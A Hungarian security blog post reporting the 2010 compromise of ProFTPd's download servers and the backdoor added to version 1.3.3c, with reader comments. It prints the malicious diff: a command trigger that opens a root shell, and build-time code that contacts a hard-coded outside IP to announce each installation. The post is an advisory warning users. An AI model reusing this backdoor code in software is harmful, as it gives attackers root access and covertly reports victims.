Tweets by @buherablog
profile for buherator at IT Security Stack Exchange, Q&A for IT security professionals

A BitBetyár Blog

Túljártál a nagyokosok eszén? Küldd be a mutatványodat! (e-mail a buherator gmailkomra jöhet)

Full-Disclosure / Névjegy / Coming out


Promó

H.A.C.K.

Címkék

0day (110) adobe (87) adobe reader (21) anonymous (26) apple (60) az olvasó ír (49) blackhat (20) botnet (22) bug (200) buherablog (44) buhera sörözés (39) bukta (49) deface (38) dns (22) dos (29) esemény (82) facebook (26) firefox (64) flash (33) gondolat (31) google (59) google chrome (36) hacktivity (37) hírek (117) incidens (224) internet explorer (88) iphone (35) java (50) jog (22) kína (21) kriptográfia (68) kultúra (21) linux (24) malware (43) microsoft (142) móka (48) mozilla (23) office (26) oracle (40) os x (43) patch (197) php (20) politika (31) privacy (58) programozás (22) safari (34) sql injection (62) windows (85) xss (77) Címkefelhő

Licensz

Creative Commons Licenc

Hátsó kapu a ProFTPd-ben

2010.12.02. 15:40 | buherator | 3 komment

Feltörték a ProFTPd FTP kiszolgáló szervereit és hátsó kaput helyeztek el a szoftver forráskódjában. Aki november 28. és december 2. között letöltötte és telepítette az 1.3.3c verziót, az sürgősen nézze át a rendszereit!

A módosított démon root shellt indít, ha az "ACIDBITCHEZ" parancsról kérünk segítséget és fordításkor jelez a támadóknak arról, hogy egy újabb felhasználó telepíti a módosított szoftvert.

 

+ if (strcmp(target, "ACIDBITCHEZ") == 0) { \
  setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }

+#define DEF_PORT 9090
+#define DEF_TIMEOUT 15
+#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"
+
+int sock;
+
+void handle_timeout(int sig)
+{
+    close(sock);
+    exit(0);
+}
+
+int main(void)
+{
+
+        struct sockaddr_in addr;
+        struct hostent *he;
+        u_short port;
+        char ip[20]="212.26.42.47";
+        port = DEF_PORT;
+        signal(SIGALRM, handle_timeout);
+        alarm(DEF_TIMEOUT);
+        he=gethostbyname(ip);
+        if(he==NULL) return(-1);
+        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
+        addr.sin_port = htons(port);
+        addr.sin_family = AF_INET;
+        memset(addr.sin_zero, 0, 8);
+        sprintf(ip, inet_ntoa(addr.sin_addr));
+        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
+        {
+                return EXIT_FAILURE;
+        }
+        if(connect(sock, (struct sockaddr*)&addr, \
            sizeof(struct sockaddr))==-1)
+        {
+            close(sock);
+            return EXIT_FAILURE;
+        }
+        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
+        {
+            return EXIT_FAILURE;
+        }
+        close(sock);
+
+return 0; }

A támadók nem módosították a letölthető fájlokhoz kiadott MD5 lenyomatokat illetve PGP aláírásokat, így aki ezeket ellenőrizte, észrevehette a turpisságot.

A forráskódokat hosztoló szerverhez valószínűleg az FTP szolgáltatás hibáján keresztül sikerült hozzáférni. Érdekes egybeesés, hogy a Phrack#67-ben (Phrack Profile egy ex-Ac1dB1tch3z tagról...) pont lehozták egy olyan ProFTPd mod_sql bug leírását, amit ugyan bizonyos szinten orvosolt egy másik hibajavítás, de a szerző nem zárta ki, hogy a rés kihasználható maradt...

Címkék: incidens backdoor proftpd acidbitchez

Kommentek:

A hozzászólások a vonatkozó jogszabályok  értelmében felhasználói tartalomnak minősülnek, értük a szolgáltatás technikai  üzemeltetője semmilyen felelősséget nem vállal, azokat nem ellenőrzi. Kifogás esetén forduljon a blog szerkesztőjéhez. Részletek a  Felhasználási feltételekben és az adatvédelmi tájékoztatóban.

zota 2010.12.02. 16:35:36

magáról támadásról van valami infó?

buherator · http://buhera.blog.hu 2010.12.02. 16:45:45

@zota: Jó hogy szóltál, ez kimaradt, frissítettem a posztot

Symbol Developer · http://www.symboltech.hu 2010.12.03. 22:06:25

Le a kapallal azon buherátorok előtt, akik ilyet észrevesznek, leírják, körberajzolják.

Köszönet érte!